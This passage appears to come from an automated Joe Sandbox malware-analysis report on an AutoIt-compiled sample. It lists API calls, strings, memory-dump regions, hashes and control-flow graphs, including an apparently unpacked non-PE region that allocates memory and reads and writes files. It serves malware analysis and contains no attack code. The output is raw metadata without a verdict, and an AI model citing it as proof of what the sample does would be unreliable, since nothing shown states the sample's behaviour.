Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 4b03a327af12bc897b20210a88a619c884bba0e5a58419d291cae6ea4212562e
• Instruction ID: 23e3a4bfb85f5b20c798ad3f825e500e001f7ec6bf74d3425eefc8f3234c7cc9
• Opcode Fuzzy Hash: 4b03a327af12bc897b20210a88a619c884bba0e5a58419d291cae6ea4212562e
• Instruction Fuzzy Hash: FC3158B1844349EFDB10CFA4EC89A8DBBF4FB0A710F14446EE590E62A1D3B90589EF51

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00EE3074
• RegisterClassExW.USER32(00000030), ref: 00EE309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE30AF
• InitCommonControlsEx.COMCTL32(?), ref: 00EE30CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE30DC
• LoadIconW.USER32(000000A9), ref: 00EE30F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE3101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: c9dd22c77d1ce286390cd79152148b4ccadf29a85292a8afd8284fa3a5d49828
• Instruction ID: f1a304fbccc165a3f8ec294080e3c4e373a6c621becd8963202a9c43c9d6c03b
• Opcode Fuzzy Hash: c9dd22c77d1ce286390cd79152148b4ccadf29a85292a8afd8284fa3a5d49828
• Instruction Fuzzy Hash: C721C4B1D1121CAFDB00DFA4ED89B9DBBF4FB09B00F00412AF921A62A0D7B54548AF91

Control-flow Graph

APIs
  • Part of subcall function 00EE4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FA52F8,?,00EE37AE,?), ref: 00EE4724
  • Part of subcall function 00F0050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00EE7165), ref: 00F0052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00EE71A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F1E8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F1E909
• RegCloseKey.ADVAPI32(?), ref: 00F1E947
• _wcscat.LIBCMT ref: 00F1E9A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 43b999cef0b12947efe28f40fea47ae87d7a7db33ae28ae23d7cae346aac70f2
• Instruction ID: 22ac6e19f573423f0c04e59ee8c92622de6e8765986605625b50d4121a9831e0
• Opcode Fuzzy Hash: 43b999cef0b12947efe28f40fea47ae87d7a7db33ae28ae23d7cae346aac70f2
• Instruction Fuzzy Hash: 8371D2B25083099EC704EF65EC41AABBBE8FF85310F44052EF495D71A1DB71D948EB52

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00EE3A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00EE3A5F
• LoadIconW.USER32(00000063), ref: 00EE3A76
• LoadIconW.USER32(000000A4), ref: 00EE3A88
• LoadIconW.USER32(000000A2), ref: 00EE3A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EE3AC0
• RegisterClassExW.USER32(?), ref: 00EE3B16
  • Part of subcall function 00EE3041: GetSysColorBrush.USER32(0000000F), ref: 00EE3074
  • Part of subcall function 00EE3041: RegisterClassExW.USER32(00000030), ref: 00EE309E
  • Part of subcall function 00EE3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE30AF
  • Part of subcall function 00EE3041: InitCommonControlsEx.COMCTL32(?), ref: 00EE30CC
  • Part of subcall function 00EE3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EE30DC
  • Part of subcall function 00EE3041: LoadIconW.USER32(000000A9), ref: 00EE30F2
  • Part of subcall function 00EE3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EE3101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: ac7d2de2dde4f477b9d940472fe2384babf0ccbdfbd3afba422f7903d5beb9bc
• Instruction ID: 8d0e077b3a27902dd00c2f085d3f02eac7bad3555a853c5c665be54b77b08ed1
• Opcode Fuzzy Hash: ac7d2de2dde4f477b9d940472fe2384babf0ccbdfbd3afba422f7903d5beb9bc
• Instruction Fuzzy Hash: 0E2115B1D0030CAFEB10DFA5ED49B9D7BF4FB0AB11F10012AE504AA2A1D3B55A54AF94

Control-flow Graph

APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00EE36D2
• KillTimer.USER32(?,00000001), ref: 00EE36FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE371F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EE372A
• CreatePopupMenu.USER32 ref: 00EE373E
• PostQuitMessage.USER32(00000000), ref: 00EE374D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                            • String ID: TaskbarCreated
                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                            • Opcode ID: d06cf9e2f0cc19fac344892527992365fad27116df2d023291b36438290a6a72
                                                                                                                            • Instruction ID: 8dba28126989c99ea11a3907f6224546ccf46d5d405da97ff5a0256d3f43b2ea
                                                                                                                            • Opcode Fuzzy Hash: d06cf9e2f0cc19fac344892527992365fad27116df2d023291b36438290a6a72
                                                                                                                            • Instruction Fuzzy Hash: EF4167F220058EFBDB109F75EC0DBBA37A4EB06300F142126F502F72E2CA659E44B261

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
• String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
• API String ID: 1825951767-3513169116
• Opcode ID: 27ef74fb1b0c3fca6b1cb919cb18a81645dbeab5265cd413288edccd2ad35e2a
• Instruction ID: c0aa8f3dc71379fc86b716c0aa3605d7b7207453ba0a1170ebe1a9436f48ebc9
• Opcode Fuzzy Hash: 27ef74fb1b0c3fca6b1cb919cb18a81645dbeab5265cd413288edccd2ad35e2a
• Instruction Fuzzy Hash: B9A17EB2D0029DAADF05EBA1DC95EEEB7B8BF15310F401429F415B7192DF749A08DB60

Control-flow Graph

Control-flow graph (rendered image omitted; entry block 143fc98-143fcea, basic blocks 143fc98-143fe50; API calls in graph: CreateFileW (2), VirtualAlloc, ReadFile, WriteFile, CloseHandle, VirtualFree; subcall 143fb98)
APIs
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0143FCDD
Memory Dump Source
• Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction ID: 1d7e71e964223ef4ac8e36ee79571290bd6f33283b631fd1284dccbd23fb145c
• Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
• Instruction Fuzzy Hash: 8C510675A50208FBEB20DFA4CC49FDF7778AF8C710F108519F61AEB281DA749A458B60

Control-flow Graph

Control-flow graph (rendered image omitted; single basic block ee39d5-ee3a45; API calls in graph: CreateWindowExW (2), ShowWindow (2))
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EE3A03
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EE3A24
• ShowWindow.USER32(00000000,?,?), ref: 00EE3A38
• ShowWindow.USER32(00000000,?,?), ref: 00EE3A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 7fc349f6555c08d60953edb362fbab4d5c3d7b6344ea69a7fa56b7f7d5e9e39f
• Instruction ID: 7bc6b4abc633aa53819e0c48736fdfa4beb48b25df09bb02518182f034a6d703
• Opcode Fuzzy Hash: 7fc349f6555c08d60953edb362fbab4d5c3d7b6344ea69a7fa56b7f7d5e9e39f
• Instruction Fuzzy Hash: BEF03AB05102987EEB3057637C08F2B3EBDD7C7F50B00002ABA00A2171C6610800FAB0

Control-flow Graph

Control-flow graph (rendered image omitted; entry block ee407c-ee4092, basic blocks ee407c-ee417d and f1d3c8-f1d41e; API calls in graph: LoadStringW, Shell_NotifyIconW; subcalls include ee7a16, ee7bcc, ee7b2e, ee6fe3, f02de0, ee454e, f02dbc, ee5904, ee7cab, ee8047)
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F1D3D7
  • Part of subcall function 00EE7BCC: _memmove.LIBCMT ref: 00EE7C06
• _memset.LIBCMT ref: 00EE40FC
• _wcscpy.LIBCMT ref: 00EE4150
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE4160
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
• String ID: Line:
• API String ID: 3942752672-1585850449
• Opcode ID: c6b92e9ee29e2b4661575e9f6cc849e94cae974492f8aacc963f75ce96b68308
• Instruction ID: 43dde25ab7d0c04d9deaba62ee25879c895541ab94689dc33d5db9eff3cccdcc
• Opcode Fuzzy Hash: c6b92e9ee29e2b4661575e9f6cc849e94cae974492f8aacc963f75ce96b68308
• Instruction Fuzzy Hash: BC310FB100838CAFD720EB61DC46FDB73E8AF55314F10152AF285A20E2EB70A648D793

Control-flow Graph

Control-flow graph (rendered image omitted; entry block f0541d-f05436, basic blocks f0541d-f055e0; no Windows API calls in graph; subcalls include f08b28, f08db6, f02de0, f10ba7, f10cc8, f046e6, f10e5b)
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction ID: 37aa14df6b306ea9de6ff0c22c66128a0b930f061168e5cf61b54f24ab0a3178
• Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
• Instruction Fuzzy Hash: DC51B375A00B05DBCF24CEA9DC406BF77A6AF40B34F288729E825962D1D7B49D90BF40

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1150 ee686a-ee6891 call ee4ddd 1153 f1e031-f1e041 call f4955b 1150->1153 1154 ee6897-ee68a5 call ee4ddd 1150->1154 1158 f1e046-f1e048 1153->1158 1154->1153 1161 ee68ab-ee68b1 1154->1161 1159 f1e067-f1e0af call f00db6 1158->1159 1160 f1e04a-f1e04d call ee4e4a 1158->1160 1170 f1e0b1-f1e0bb 1159->1170 1171 f1e0d4 1159->1171 1164 f1e052-f1e061 call f442f8 1160->1164 1161->1164 1165 ee68b7-ee68d9 call ee6a8c 1161->1165 1164->1159 1173 f1e0cf-f1e0d0 1170->1173 1174 f1e0d6-f1e0e9 1171->1174 1175 f1e0d2 1173->1175 1176 f1e0bd-f1e0cc 1173->1176 1177 f1e260-f1e271 call f02d55 call ee4e4a 1174->1177 1178 f1e0ef 1174->1178 1175->1174 1176->1173 1188 f1e273-f1e283 call ee7616 call ee5d9b 1177->1188 1179 f1e0f6-f1e0f9 call ee7480 1178->1179 1183 f1e0fe-f1e120 call ee5db2 call f473e9 1179->1183 1194 f1e122-f1e12f 1183->1194 1195 f1e134-f1e13e call f473d3 1183->1195 1201 f1e288-f1e2b8 call f3f7a1 call f00e2c call f02d55 call ee4e4a 1188->1201 1197 f1e227-f1e237 call ee750f 1194->1197 1203 f1e140-f1e153 1195->1203 1204 f1e158-f1e162 call f473bd 1195->1204 1197->1183 1206 f1e23d-f1e25a call ee735d 1197->1206 1201->1188 1203->1197 1213 f1e164-f1e171 1204->1213 1214 f1e176-f1e180 call ee5e2a 1204->1214 1206->1177 1206->1179 1213->1197 1214->1197 1219 f1e186-f1e19e call f3f73d 1214->1219 1225 f1e1c1-f1e1c4 1219->1225 1226 f1e1a0-f1e1bf call ee7de1 call ee5904 1219->1226 1228 f1e1f2-f1e1f5 1225->1228 1229 f1e1c6-f1e1e1 call ee7de1 call ee6839 call ee5904 1225->1229 1250 f1e1e2-f1e1f0 call ee5db2 1226->1250 1231 f1e215-f1e218 call f4737f 1228->1231 1232 f1e1f7-f1e200 call f3f65e 1228->1232 1229->1250 1237 f1e21d-f1e226 call f00e2c 1231->1237 1232->1201 1244 f1e206-f1e210 call f00e2c 1232->1244 1237->1197 1244->1183 1250->1237
APIs
  • Part of subcall function 00EE4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00FA52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EE4E0F
• _free.LIBCMT ref: 00F1E263
• _free.LIBCMT ref: 00F1E2AA
  • Part of subcall function 00EE6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00EE6BAD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
• Opcode ID: 6f81ffc55b77600971546a40880df2a28f57e9a144e3facdc4ab21dd104fcc10
• Instruction ID: 851832e331c02a69341214106b0c3add26a48ed185f26a9e4cb33f27b6064f86
• Opcode Fuzzy Hash: 6f81ffc55b77600971546a40880df2a28f57e9a144e3facdc4ab21dd104fcc10
• Instruction Fuzzy Hash: C5917A71D00259AFCF04EFA5CC919EDB7B8BF19324F10442AF815BB2A1DB74A945EB50
APIs
  • Part of subcall function 01441618: Sleep.KERNELBASE(000001F4), ref: 01441629
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01441885
Strings
Memory Dump Source
• Source File: 00000000.00000002.1730115984.000000000143F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0143F000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_143f000_3i1gMM8K4z.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: Y7QYDFYE0VEH2VZBRFJM0K
• API String ID: 2694422964-3757137495
• Opcode ID: 6fda2a2dafbcfa590270695f2f7ff12c34470c4c9ed7ed48ad594a3346dfd6ca
• Instruction ID: 2ff3f4db7ff2c7bd07813bf5e2b060da95537a515d1e6f6018b843711ed6fd95
• Opcode Fuzzy Hash: 6fda2a2dafbcfa590270695f2f7ff12c34470c4c9ed7ed48ad594a3346dfd6ca
• Instruction Fuzzy Hash: 49619330D04248DBFF11DBA4D844BEFBB75AF19700F044599E248BB2C0D6BA5B85CB66
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EE35A1,SwapMouseButtons,00000004,?), ref: 00EE35D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EE35A1,SwapMouseButtons,00000004,?,?,?,?,00EE2754), ref: 00EE35F5
• RegCloseKey.KERNELBASE(00000000,?,?,00EE35A1,SwapMouseButtons,00000004,?,?,?,?,00EE2754), ref: 00EE3617
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 397eab22b4e4538452d477a171b53f09ac99c8090db8c5565b6c4f0b8296b49c
• Instruction ID: 8e86be9755432757d3a269296389a3b1f1a487077fbfeabf98681f700ed9b842
• Opcode Fuzzy Hash: 397eab22b4e4538452d477a171b53f09ac99c8090db8c5565b6c4f0b8296b49c
• Instruction Fuzzy Hash: 3511487191024DBFDB20CFB5EC489EEBBB8EF05744F0164A9E805E7210D2719E44A760
APIs
  • Part of subcall function 00EE4EE5: _fseek.LIBCMT ref: 00EE4EFD
  • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49824
  • Part of subcall function 00F49734: _wcscmp.LIBCMT ref: 00F49837
• _free.LIBCMT ref: 00F496A2
• _free.LIBCMT ref: 00F496A9
• _free.LIBCMT ref: 00F49714
  • Part of subcall function 00F02D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00F09A24), ref: 00F02D69
  • Part of subcall function 00F02D55: GetLastError.KERNEL32(00000000,?,00F09A24), ref: 00F02D7B
• _free.LIBCMT ref: 00F4971C
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: bd4c49df742902bd1a4c81879b5c0e86d9ac0e84342a6c31abf43c5ac4bedca4
• Instruction ID: 940201c6239768c78705d574b32751970a5d2833222f95170e5ffcc845ec8fed
• Opcode Fuzzy Hash: bd4c49df742902bd1a4c81879b5c0e86d9ac0e84342a6c31abf43c5ac4bedca4
• Instruction Fuzzy Hash: DF5172B1E04258AFDF259F65DC85A9EBBB9EF48300F10049EF609A3281DB755E80DF58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
• Instruction ID: 6f47416bff1b19eb6b73c92d042da8d3af7c8d295c3209754dd081a74c8c4ced
• Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
• Instruction Fuzzy Hash: B541D5F5E007469BDF188E69C8809AE77A6AF85360B24C53DEA15C76C0D774FD40BB40
APIs
• _memset.LIBCMT ref: 00EE44CF
  • Part of subcall function 00EE407C: _memset.LIBCMT ref: 00EE40FC
  • Part of subcall function 00EE407C: _wcscpy.LIBCMT ref: 00EE4150
  • Part of subcall function 00EE407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EE4160
• KillTimer.USER32(?,00000001,?,?), ref: 00EE4524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EE4533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F1D4B9
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 391e3d760bc2c827c027f1b1fa262ebc5822326077912054760bca049ae809ab
• Instruction ID: 7da4096c5a633bbd06015c477251b4f4275be11325dbe89436cf24c5ebdc4c8a
• Opcode Fuzzy Hash: 391e3d760bc2c827c027f1b1fa262ebc5822326077912054760bca049ae809ab
• Instruction Fuzzy Hash: 9A21D7B1904788AFE732DB24DC55BE7BBFC9F05318F04049DE69E66281C3742A88EB51
APIs
• _memset.LIBCMT ref: 00F1EA39
• GetOpenFileNameW.COMDLG32(?), ref: 00F1EA83
  • Part of subcall function 00EE4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE4743,?,?,00EE37AE,?), ref: 00EE4770
  • Part of subcall function 00F00791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F007B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
